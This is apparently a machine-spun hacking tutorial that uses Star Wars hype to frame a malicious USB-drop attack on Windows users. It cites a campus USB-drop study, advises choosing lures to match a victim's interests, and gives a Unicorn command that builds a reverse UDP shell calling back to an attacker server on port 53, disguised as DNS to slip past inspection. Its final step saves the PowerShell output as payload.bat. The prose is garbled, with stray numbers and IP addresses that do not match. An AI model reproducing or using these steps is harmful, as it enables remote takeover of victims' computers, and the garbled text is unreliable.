The Newest Star Wars Movie, Solo: A Star Wars Story recorded almost $ 350 million in its first month in theaters worldwide. This is a great opportunity to discuss how hackers can use media hype (Hollywood movie hype in this case) to get an unsuspecting Windows user to put a nasty USB stick into their computer.
A long time ago, in a galaxy far, far away … a study was carried out in which 300 malicious USB sticks were dropped by researchers at a university campus in Illinois. Almost 50% of the USB sticks were recorded and at least one file was clicked on each of these USB drives.
The data showed that adding keys to the USB keyring increased the likelihood that the flash drive was inserted into a computer. The presence of keys undoubtedly reinforced the belief that the keys and the USB key were lost and not put on the ground by a hacker. The data also suggest that USB sticks labeled "Pictures" or "Winter Break Pictures" are more likely to be inserted by the victim. The addition of keys and labels should be taken into account for USB drops.
The experiment of the researchers was aimed at students and professors. They took advantage of their credulity to believe that a student could lose his USB stick on the school grounds. But what if the destination wireless router is not located at a university?
This type of attack does not have to use the Star Wars franchise as its theme, I'm just a big one of the movies. During a reconnaissance phase, it can be discovered that a target user is obsessed with zombie movies and TV series. In this case, loading the USB flash drive with content inspired by The Walking Dead or something by a celebrated horror movie filmmaker would make more sense. The point is to label the USB flash drive and fill it with content that the intended victim will find hard to ignore. Make it tempting and exciting.
After unicorn cloning, go to the unicorn / directory and generate the following command
python unicorn.py windows / shell / reverse_udp 126.96.36.199 53
This payload creates a reverse UDP connection (19659019) reverse_udp ) to the IP address of the attacker for the VPS ( 188.8.131.52 ) on port number 53 . The use of UDP on port 53 is in an effort to further disguise the payload and its network activity. Anyone who could examine the Internet traffic sending to and from the compromised Windows computer could confuse the packets for normal DNS activity. It will not make it impossible to discover the nefarious packages, but it can help you avoid Deep Packet Inspection (DPI).
Step 4: Rescue the payload
Then use  the newly created powershell_attack.txt file in the unicorn / directory. Select the entire PowerShell command and save it to a Windows 10 computer with the filename payload.bat .